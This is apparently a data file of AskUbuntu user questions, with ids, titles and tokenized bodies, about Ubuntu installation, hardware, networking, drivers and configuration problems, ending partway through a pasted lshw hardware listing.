475702	daylight savings time glitch since 2007 ?	i 've taken it upon myself since the dates we apply and remove daylight savings time has been changed thanks to good old a'merica , and noticed today what i notice every year : the time changes twice . today june 2nd ( presumably last night at 2am while i slept ) my 14.04 lts ubuntu pc decided to set it 's clock an hour behind my other devices . when i woke up my cell phone and microwave and alarmclocks all read the same time they usually do , but my pc which was on all night and on when i woke up , read it was an hour earlier . i confirmed , my system settings are correct to my city and my time is set to automatically update from the internet , so i ca n't change it back . switching to manual is a workaround , not a fix . i 'd like to find out if this problem is ubuntu , or the time servers because i 'm fairly certain i noticed this years ago starting from the year it happened : 2007 .
475706	lenovo g500 how do i turn off secure boot to install ubuntu 14.04 ?	i am trying to install ubuntu 14.04 on windows 8.1 . i have gone through the manuals in the internet and in `` askubuntu '' but i have found no solution . i have turn off `` fast boot '' option in windows as suggested in the manual . when i restart the computer i do n't see the uefi settings option ( pressing shift while restarting the computer ) which is required to turn off `` secure boot '' option . i am unable to turn this off as i dont see uefi settings option after restart . i am using lenovo g500 laptop with windows 8.1 .
475708	unable to install ubuntu 14.04 server in hp proliant dl580 g7	i am getting error message while installing ubuntu 14.04 server in hp proliant dl580 g7 server . the error is : - warning : the following packages can not be authenticated linux-header-3.13.0-24 linux-headers-3.13.0-24-generic linux-header-generic linux-header-server e : there are problems and -y was used without -- force-yes base-installer : error : exiting on error base-installer/kernal/failed-install error i am unable to install ubuntu 14.04 , i am stuck with this error
475710	alt+tab changes the circular order in app switching popup	i 've configured my extra mouse buttons to perform app switching using xbindkeysrc & xte . on executing xte 'keydown alt_l ' 'key tab ' 'keyup alt_l ' once , the focus is switched to the app next to current active app . the problem i 'm facing with this is that the newly active app is repositioned as first in app switching popup , changing the circular order . so no matter how many times i perform the xte command using a mouse button , only first two apps of app switching popup will be used for switching by the way for alt+shift+tab , bring newly active app to first position does n't cause the problem as the circular order is n't changed
475711	turn off keyboard back-light sony ( vaio svf1521dcxw )	i have a sony laptop and i want to turn keyboard back-light off . it does n't have a shortcut function key for doing this on the keyboard . i can turn off it with vaio control center in windows but i do n't know how can i turn it off in ubuntu 14.04 . there is n't available to me : /sys/devices/platform/sony-laptop/kbd_backlight does n't exist on my machine . i have this folder /sys/devices/platform/sony-laptop/ and the ls command shown this result : user @ user-pc : /sys/devices/platform/sony-laptop $ ls battery_care_health battery_care_limiter driver modalias power subsystem touchpad uevent there is three folder one power folder and two shortcut-ed folder driver , subsystem and five file contains battery_care_health , battery_care_limiter , modalias , touchpad and event this is the output of running sudo modinfo sony-laptop : filename : /lib/modules/3.13.0-35-generic/kernel/drivers/platform/x86/sony-laptop.ko version : 0.6 license : gpl description : sony laptop extras driver ( spic and snc acpi device ) author : stelian pop , mattia dongili srcversion : 5c6e050349475558a231c59 alias : acpi* : sny6001 : * alias : acpi* : sny5001 : * depends : intree : y vermagic : 3.13.0-35-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : b1:41:4a : e9:6c:1b:0e : bb:7c:14:1f : a4:05 : c1 : f6 : c9:8e:8a:66 : f0 sig_hashalgo : sha512 parm : debug : set this to 1 ( and rtfm ) if you want to help the development of this driver ( int ) parm : no_spic : set this if you do n't want to enable the spic device ( int ) parm : compat : set this if you want to enable backward compatibility mode ( int ) parm : mask : set this to the mask of event you want to enable ( see doc ) ( ulong ) parm : camera : set this to 1 to enable motion eye camera controls ( only use it if you have a c1ve or c1vn model ) ( int ) parm : minor : minor number of the misc device for the spic compatibility code , default is -1 ( automatic ) ( int ) parm : kbd_backlight : set this to 0 to disable keyboard backlight , 1 to enable it ( default : no change from current value ) ( int ) parm : kbd_backlight_timeout : meaningful values vary from 0 to 3 and their meaning depends on the model ( default : no change from current value ) ( int ) with the suggested command : sudo modprobe -r sony_laptop sudo modprobe -v sony_laptop kbd_backlight=0 output was : insmod /lib/modules/3.13.0-35-generic/kernel/drivers/platform/x86/sony-laptop.ko kbd_backlight=0 it does n't seem to affect the keyboard backlight . and also trying this command : sudo modprobe -v sony_laptop kbd_backlight_timeout=3 kbd_backlight=0 and does n't seem to effect the keyboard backlight i also test it after restart laptop , and i did n't see any effect too . important : by default , keyboard backlight is off ; when i press a key it turns on and after 15 seconds it turns off again . it 's the same result on battery and ac power i followed also http : //ubuntuforums.org/showthread.php ? t=2139597 and keyboard backlighting not working on a vaio vpcsb11fx but did n't work so .
475719	how to decrease the utilization of my ssd drive as much as possible ?	i have a pc with a 250gb ssd & 500gb sata hd . i will have linux root ( / ) in the ssd disk after the installation . i want to minimize ssd utilization as much as possible . therefore , i will put the /home and swap on the sata disk . is there anything else that i should put on sata hard disk to decrease the utilization of ssd ?
475723	consistent crashing of system when debugging java using eclipse	i 'm using ubuntu 14.04 with unity for work . i 've been debugging some java code and every time i step inside a given method i have problems and have to restart my machine ( 4 times now ) . the only functionality that remains is the show hide feature of the unity bar . everything else is gone . i have just tested this on a windows machine and i can debug fine . my questions are 1 ) what should i do about this ? bug report ? 2 ) how can a program like eclipse , java and debugging cause a system wide failure ?
475724	using vinagre with multiple computers	i have got multiple computers that i want to connect to . they 're all in my local area network . i do n't want to write their ip addresses all the time . i 'm looking for an easier way to connect them . like , vinagre -- connect 1 connecting computers by their predefined ids or something like that . is that possible ?
475729	security risk for making the sudo password timeout infinite ?	i recently changed my sudo password timeout ( the amount of time that passes before sudo asks you for your password again ) . it defaults to 15 minutes ; i raised that to an hour with sudo visudo and changing defaults env_reset , timestamp_timeout=60 . you can make sudo never ask for a password again , however , by setting it to -1 . while i have a feeling that every admin under the sun will tell me this is a bad idea , i 'm wondering what the specific security risks are . if someone is logged in as me , do n't they already have my password ? what specific scenario will having a non-infinite password timeout protect me from ? my ubuntu box runs a web server exposed to the public .
475734	accessing ubuntu after downloading it	i 've downloaded ubuntu desktop 14.04 , but where is it ? i did n't get asked anything during the download . do i have to log out of windows before i can access it ? i turned the pc off and downloaded it again , but still ca n't find it ignore the tag as i do n't understand them , i 'm just adding one till its accepted
475738	usb keyboard/mouse , networking broken by kernel update	i recently ( automatically ) updated all the kernel-related packages ( linux-image , linux-headers etc ) to version 3.13.0-27.50 . i 'm using the generic kernel for amd64 . after reboot i find that my usb keyboard and mouse do n't work . i ca n't see any usb-related errors in the kernel log , and the devices are correctly recognised , appearing in the output of lsusb . they just do n't do anything ( luckily the box has ps/2 ports which do work ) . i can still access usb storage . networking is a similarly confusing situation . ifconfig -a shows the loopback device and a device called virbr0 which i gather is a virtual device for vms ( presumably because i have qemu installed ) . eth0 is missing . when i plug in a usb wifi dongle , it 's correctly detected by the usb system ( as can be seen in the kernel log and output of lsusb ) but nothing networking-related happens . dmesg | grep -i eth produces no output , dmesg | grep -i net contains lines saying `` registered protocol family n '' , where n is 16 , 2 , 1 , 10 and 17 , and not really much else . and of course no wlan0 appears . in the output from lshw , the description of the network card starts with `` *-network unclaimed '' . sorry , i 'm reduced to asking this ridiculously open-ended question because i do n't really know where to start on this - it sort of looks like bits of the kernel are just.. missing . is there any chance this is a known issue ? has anyone experienced this ? could anyone suggest anything ? in the meantime i 'm going to try and build and boot the latest kernel . some random hardware info : motherboard is acer wmcp78m , it runs a phoenix bios cpu is an amd athlon xii [ and yes , this is my main machine : ( haha ] usb controller is nvidia mcp78s , it 's ohci the ethernet controller is nvidia mcp77
475739	ap-hotspot not working with vpn	i have ap-hotspot up and running just fine on my laptop running xubuntu14.04 . the problem starts when i activate a vpn connection . i can still connect to the hotpot , but there is no internet connection . can someone help me with this please ?
475740	test dev website	the task is to drop a few mysql tables from a dev site and test if that generated any errors on the site , before doing it on the live site . since the site is also a live site , i included the dev site in the hosts file . does it matter if it 's it 's local or public ip ? to be sure i added both . etc/hosts/ local_ip website public_ip website i 'm looking for admin tools/commands that will help me test the dev site and gather as much info as possible that has to do with the dev site itself . etc . in firefox : can i get info that the dev site is properly loaded and not the live site ? how do i do it through the terminal ? terminal : what commands can i run to get as much info possible about the `` dev '' site . can i query info as name of the sites mysql database , server ip of the site etc . other commands of importance ?
475741	how to know the use of my applications ?	i want to know how long my programs have been used . for example if i use my web browser i want to know the start and the close time to obtain a total of use time . basicly i want to know when an application starts an when its ends , and in function of the event do something like register the time in a file . i 've searched about listening kernel events or something like that but nothing . also i tried with supervisord but it saids that the process close too quickly and not record anything . another of my attempts was to use the pyinotify library to monitor the /proc folders but that was a complete failure . i 'm working in ubuntu . any tips ? thanks in advance these are my sources https : //github.com/seb-m/pyinotify http : //supervisord.org/
475742	i can ping my gateway but i ca n't access internet and lan	i was trying to make my server ip static so i changed my /etc/network/interfaces to this : auto lo eth0 iface lo inet loopback iface eth0 inet static address 10.1.1.10 netmask 255.0.0.0 gateway 10.1.1.1 now i ca n't access my lan . my samba server was working fine before this change and now nobody in lan can see it . i can ping my gateway ( 10.1.1.1 ) but i ca n't access internet . route command : route -n destination gateway genmask flags metric ref use iface default 10.1.1.1 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 * 25.0.0.0 u 0 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 update : after restarting my server i can see my samba folders from other computers . now the only problem that remains is that i ca n't access internet from it .
475748	pls help installation has ruined laptop	hi this was my time using linux . so i installed ubuntu from windows 7 via usb . after booting into ubuntu i proceeded to do a full install over windows . this seemed to be going fine but at the point where i was to sign up to ubuntu one it froze . after awhile maybe 30 mins i realised nothing was going to happen , so i restarted . now after the bios options bit passes all i get is a prompt flashing at the top left of a black screen . i have tried booting up via usb option but nothing happens , i have tried this 6 or 7 times with fresh usb each time and also with lubuntu . i 'm not sure if i have correctly made a live usb obviously i believe i have been but being new i ca n't guarantee this . can anyone help me get some functional out of my laptop . thanks ben
475749	ubuntu stuck suspending console while going to sleep	every now and then , about 1 in 10 times when i suspend my ubuntu , i get a black screen and console with the following text : pm : syncing filesystems ... done . pm : preparing system for mem sleep freezing user space processes ... done . freezing remaining freezable tasks ... done . pm : entering mem sleep suspending console ( s ) ( use no_console_suspend to debug ) and it stays like this indefinitely ; i have to force restart it . i once left it like this for an hour . this might be a bug , but it might just as well be something i touched . i do that and break things a lot . edit to add : i 'm using ubuntu 14.04
475750	kernel event listener	i wonder if there is something similar to an event listener in unix that a program can subscribes specifically i want to know : start and end times of a user session start and end of the applications executed by that user any tips ? thanks in advance
475756	could not find required opengl entry point 'glgeterror '	i am not able to play `` half-life-2 '' on steam + ubuntu 14.04 . error shown in message box on screen : could not find required opengl entry pint 'glgeterror ' ! either your video card is unsupported , or your opengl driver needs to be updated . i have a dell inspiron laptop . my os is ubuntu 14.04 and my graphics card is amd radeon hd 8600m . i have installed amd properietry driver . the partial output of `` glxinfo '' is as follows : name of display : :0 libgl : screen 0 does not appear to be dri3 capable libgl : pci id for fd 4 : 8086:0a16 , driver i965 libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/i965_dri.so libgl : ca n't open configuration file /home/arushi/.drirc : no such file or directory . libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/swrast_dri.so libgl : driver does not expose __dridrivergetextensions_swrast ( ) : /usr/lib/i386- linux-gnu/dri/swrast_dri.so : undefined symbol : __dridrivergetextensions_swrast libgl : ca n't open configuration file /home/arushi/.drirc : no such file or directory . libgl : ca n't open configuration file /home/arushi/.drirc : no such file or directory . libgl error : failed to load driver : swrast display : :0 screen : 0 direct rendering : no ( if you want to find out why , try setting libgl_debug=verbose )
475760	prevent light-locker from setting volume to 100 %	i 'm on 14.04 with xfce . when i lock the screen it appears to mute the system volume ( or perhaps just mute anything from the locked session ? ) . when i log back in the volume is reset to 100 % . this hurts my ears ! how can i stop light-locker doing this ?
475762	audiobox.fm quiet terminal ?	i am really enjoying the service offered by audiobox.fm in regards to acting as a music streaming server on ubuntu 14.04 . see product . i am a novice linux user and would like to know if anyone else uses this and if there is any way to hide the terminal window that is created and persistant while audiobox.fm applet is running . see example . thank you . edit : command used to run the applet : ./jre/bin/java -jar audiobox.jar
475764	docker.io dns does n't work , it 's trying to use 8.8.8.8	i have a new ubuntu 14.04 install , and want to use docker to run my old stuff that needs 12.04 . dns inside docker does n't work . my laptop 's resolv.conf looks like : nameserver 127.0.0.1 which does n't work with docker , apparently . it therefore tries to set the nameservers to 8.8.8.8 and 8.8.4.4 ; when i do $ sudo docker run -i -t ubuntu /bin/bash it says : warning : local ( 127.0.0.1 ) dns resolver found in resolv.conf and containers ca n't use it . using default external servers : [ 8.8.8.8 8.8.4.4 ] and sure enough , inside the docker instance , resolv.conf looks like : nameserver 8.8.8.8 nameserver 8.8.4.4 i can ping both of those successfully from within the docker instance . however , there is no dns ( e.g. , ping google.com fails ) . ifconfig output inside docker : eth0 link encap : ethernet hwaddr aa : e9:9f:83:9d:92 inet addr:172.17.0.2 bcast:0.0.0.0 mask:255.255.0.0 inet6 addr : fe80 : :a8e9:9fff : fe83:9d92/64 scope : link up broadcast running mtu:1500 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:648 ( 648.0 b ) tx bytes:738 ( 738.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) now what ?
475766	what are the advantages of 12.04.4 ?	what advantages does ubuntu 12.04.4 offers ?
475768	how do i set permissions for my windows partition for all to use ?	i installed ubuntu 12.04 along side windows 7 on my computer . now , when i need to access the files on the windows side , i have to go to the device known as 240gb file system . the path to it is /media/169821de9821bd5d/ now , i can access it fine , but my sister also has an account on my computer and ubuntu does not allow her to copy or modify these files , even though she is an administrator , too . how do i set the permissions to allow her to have full access privileges like me ? i ran sudo gedit /etc/fstab and got this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=d6e20544-68a5-4408-b2f9-55a65a4a00b4 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=98e8c982-6356-4caa-9e93-6346f14f63d8 none swap sw 0 0 /dev/sda1 /media/sda1 ntfs defaults 0 0
475773	2 monitor 2 gpus one problem	i have 2 monitors one running off my pci e card which is a 7870 and another running off my igp which is a 760g express or whatever from amd . the second monitor only shows up in 1024x768 and the monitor is n't detected . however the pci e one shows up just fine like nothing is wrong . how can i get it to recognize my 2nd monitor properly . i am running 14.04
475776	can freerdp be used as server ?	can freerdp be configured as a server ? that is can i install freerdp in my ubunutu vm running on a server and remotely connect to it from my windows remote desktop client ? thank you
475777	error boostraping juju maas juju-db already running	i 'm trying to bootstrap a juju maas environment . i get the error `` job is already running : juju-db '' . i destroy the environment run again and get the same thing . it brings up a maas node and does all kinds of provisioning but then fails .
475779	ca n't complete the installation . please help	i boot from usb , and after i choose the language and connect to wifi , i go to the 3rd step which is the preparing to install ubuntu , it checks everything is going right , no red x marks and below the dialogue there are the optional choices download update while installing install third-party software whether i choose an option or not , the mouse pointer is just freezing for hours and i ca n't continue .
475782	graphics drivers for intel nuc ( de3815tyke )	i 'm searching for the graphics drivers for my nuc with ubuntu 14.04 . i found and installed `` intel graphics installer for linux '' which run fine but without effect . i updated the kernel ( 3.13 to 3.14.1 ) i have to play 1080p videos , but it 's still not fluid ... the hardware is new . it 's maybe the cause the drivers are missing , but on pc with nvidia cards , i had no problem .
475783	printer installation problems under ubuntu 14.04	i moved from 12.04 to 14.04 and i am no more able to print . this is a network printer and if i try to print something the printer completely freezes ( one need to restart it by unplugging the supply ! ) . the printer is a konica minolta bizhub c280 . i have tryed 3 different ubuntu installations : - ubuntu 14.04 ( 64bits ) - xubuntu 14.04 ( 64bits ) - ubuntu 14.04 ( 32bits ) [ as my 12.04 was a 32bits ) i think the short term solution is to come back to 12.04 !
475787	php amqp error while running make	i 'm trying to install php amqp according to this answer http : //stackoverflow.com/a/9997263/2271028 but at the make command i see following : /bin/bash /var/www/rabbitmq-c/amqp-1.4.0/libtool -- mode=compile cc -i . -i/var/www/rabbitmq-c/amqp-1.4.0 -dphp_atom_inc -i/var/www/rabbitmq-c/amqp-1.4.0/include -i/var/www/rabbitmq-c/amqp-1.4.0/main -i/var/www/rabbitmq-c/amqp-1.4.0 -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -c /var/www/rabbitmq-c/amqp-1.4.0/amqp.c -o amqp.lo libtool : compile : cc -i . -i/var/www/rabbitmq-c/amqp-1.4.0 -dphp_atom_inc -i/var/www/rabbitmq-c/amqp-1.4.0/include -i/var/www/rabbitmq-c/amqp-1.4.0/main -i/var/www/rabbitmq-c/amqp-1.4.0 -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -c /var/www/rabbitmq-c/amqp-1.4.0/amqp.c -fpic -dpic -o .libs/amqp.o in file included from /var/www/rabbitmq-c/amqp-1.4.0/amqp.c:46:0 : /var/www/rabbitmq-c/amqp-1.4.0/php_amqp.h:303:2 : error : unknown type name 'amqp_socket_t' /var/www/rabbitmq-c/amqp-1.4.0/amqp.c : in function 'amqp_error ' : /var/www/rabbitmq-c/amqp-1.4.0/amqp.c:616:4 : warning : format ' % s ' expects argument of type 'char * ' , but argument 4 has type 'int ' [ -wformat ] make : *** [ amqp.lo ] error 1 i see that there is some trouble with make , but can not resolve this problem . any ideas ? thanks .
475789	how to remove ubunto from boot screen ?	i tried to install ubuntu 14.04 on my windows 8 , and in the installation wizard i chose `` help me boot from cd '' . now i have something like this when i restart the computer : http : //i.stack.imgur.com/hxdqr.png if i click ubuntu i get an error about a missing file ( wubildr.mbr ) . i found a solution here . but that 's not my concern now . i do n't know if that means i have ubuntu installed on my computer now or not , but i wan na delete it from the boot screen . i figured that i need to delete its partition , so i went to disk management and found the following : http : //i.stack.imgur.com/w0op4.png my question is : which one should i delete ?
475790	install and test openstack in 14.04 in only one computer using maas and juju	according to the documentation in 14.04 openstack is simpler to install than before . in my case i need to make a lab/test in one computer using maas and juju . i already know about devstack but as i said before i need to test maas and juju . where can i find the steps to do it ?
475794	cd/dvd drive not working	the cd/dvd drive on my sisters ' ( i 'm helping her shift from win . xp ( now officially deprecated by microsoft ) to ubuntu ) system . now , it may end up being a failed attempt , all together ( almost the whole last year ( when she 's been on xp ) the disk drive has n't ( not even powering on ) been working . ) , i just want to make sure i 've explored every remote possibility . because i figure , `` huh , now that i 've got ubuntu running , instead of xp , that ( just ) might make a difference. '' . i have tried using the sudo lshw command in the terminal , to ( seemingly ) no avil , but , who knows , you might be able to make something out of it . here 's the output : kyra @ kyra-satellite-p105 : ~ $ sudo lshw [ sudo ] password for kyra : kyra-satellite-p105 description : notebook product : satellite p105 ( ) vendor : toshiba version : pspa0u-0tn01m serial : 96084354w width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : administrator_password=disabled boot=oem-specific chassis=notebook frontpanel_password=unknown keyboard_password=unknown power-on_password=disabled uuid=00900559-f88e-d811-82e0-00163680e992 *-core description : motherboard product : satellite p105 vendor : toshiba physical id : 0 version : not applicable serial : 1234567890 *-firmware description : bios vendor : toshiba physical id : 0 version : v4.70 date : 01/19/20092 size : 92kib capabilities : isa pci pcmcia pnp upgrade shadowing escd cdboot acpi usb biosbootspecification *-cpu description : cpu product : intel ( r ) core ( tm ) 2 cpu t5500 @ 1.66ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) 2 cpu t5 slot : u2e1 size : 1667mhz capacity : 1667mhz width : 64 bits clock : 166mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm cpufreq *-cache:0 description : l1 cache physical id : 5 slot : l1 cache size : 16kib capacity : 16kib capabilities : asynchronous internal write-back *-cache:1 description : l2 cache physical id : 6 slot : l2 cache size : 2mib capabilities : burst external write-back *-memory description : system memory physical id : c slot : system board or motherboard size : 2gib capacity : 3gib *-bank:0 description : sodimm ddr2 synchronous physical id : 0 slot : m1 size : 1gib width : 64 bits *-bank:1 description : sodimm ddr2 synchronous physical id : 1 slot : m2 size : 1gib width : 64 bits *-pci description : host bridge product : mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display:0 description : vga compatible controller product : mobile 945gm/gms , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : d0200000-d027ffff ioport:1800 ( size=8 ) memory : c0000000-cfffffff memory : d0300000-d033ffff *-display:1 unclaimed description : display controller product : mobile 945gm/gms/gme , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : d0280000-d02fffff *-multimedia description : audio device product : nm10/ich7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : d0340000-d0343fff *-pci:0 description : pci bridge product : nm10/ich7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:3000 ( size=4096 ) memory:84000000-841fffff ioport:84200000 ( size=2097152 ) *-pci:1 description : pci bridge product : nm10/ich7 family pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:4000 ( size=4096 ) memory:84400000-846fffff ioport:84700000 ( size=2097152 ) *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:13:02 : d6 : d2:35 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.13.0-29-generic firmware=15.32.2.9 ip=10.110.20.157 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:43 memory:84400000-84400fff *-pci:2 description : pci bridge product : nm10/ich7 family pci express port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport:5000 ( size=4096 ) memory:84900000-84afffff ioport:84b00000 ( size=2097152 ) *-usb:0 description : usb controller product : nm10/ich7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport:1820 ( size=32 ) *-usb:1 description : usb controller product : nm10/ich7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport:1840 ( size=32 ) *-usb:2 description : usb controller product : nm10/ich7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport:1860 ( size=32 ) *-usb:3 description : usb controller product : nm10/ich7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport:1880 ( size=32 ) *-usb:4 description : usb controller product : nm10/ich7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : d0544000-d05443ff *-pci:3 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : ioport:2000 ( size=4096 ) memory : d0000000-d00fffff ioport:80000000 ( size=67108864 ) *-pcmcia description : cardbus bridge product : pcixx12 cardbus controller vendor : texas instruments physical id : 4 bus info : pci @ 0000:0a:04.0 version : 00 width : 32 bits clock : 33mhz capabilities : pcmcia bus_master cap_list configuration : driver=yenta_cardbus latency=176 maxlatency=5 mingnt=192 resources : irq:17 memory : d0004000-d0004fff ioport:2400 ( size=256 ) ioport:2800 ( size=256 ) memory:80000000-83ffffff memory:88000000-8bffffff *-firewire description : firewire ( ieee 1394 ) product : pcixx12 ohci compliant ieee 1394 host controller vendor : texas instruments physical id : 4.1 bus info : pci @ 0000:0a:04.1 version : 00 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : driver=firewire_ohci latency=64 maxlatency=4 mingnt=3 resources : irq:17 memory : d0007000-d00077ff memory : d0000000-d0003fff *-storage description : mass storage controller product : 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) vendor : texas instruments physical id : 4.2 bus info : pci @ 0000:0a:04.2 version : 00 width : 32 bits clock : 33mhz capabilities : storage pm bus_master cap_list configuration : driver=tifm_7xx1 latency=64 maxlatency=4 mingnt=7 resources : irq:17 memory : d0005000-d0005fff *-generic description : sd host controller product : pcixx12 sda standard compliant sd host controller vendor : texas instruments physical id : 4.3 bus info : pci @ 0000:0a:04.3 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=sdhci-pci latency=64 maxlatency=4 mingnt=7 resources : irq:17 memory : d0007800-d00078ff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:0a:08.0 logical name : eth0 version : 02 serial : 00:16:36:80 : e9:92 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half latency=64 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mbit/s resources : irq:20 memory : d0006000-d0006fff ioport:2000 ( size=64 ) *-isa description : isa bridge product : 82801gbm ( ich7-m ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-ide description : ide interface product : 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 02 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:19 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport:18b0 ( size=16 ) *-serial unclaimed description : smbus product : nm10/ich7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport:18c0 ( size=32 ) *-scsi physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : st9250421as vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : sd13 serial : 5th0b2hb size : 232gib ( 250gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000d7fd5 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 13bb4bdd-8cc9-40e2-a490-dbe436c2a02d size : 230gib capacity : 230gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2014-06-01 17:37:01 filesystem=ext4 lastmountpoint=/ modified=2014-06-01 21:15:21 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-06-01 21:15:21 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 2037mib capacity : 2037mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 2037mib capabilities : nofs *-remoteaccess unclaimed 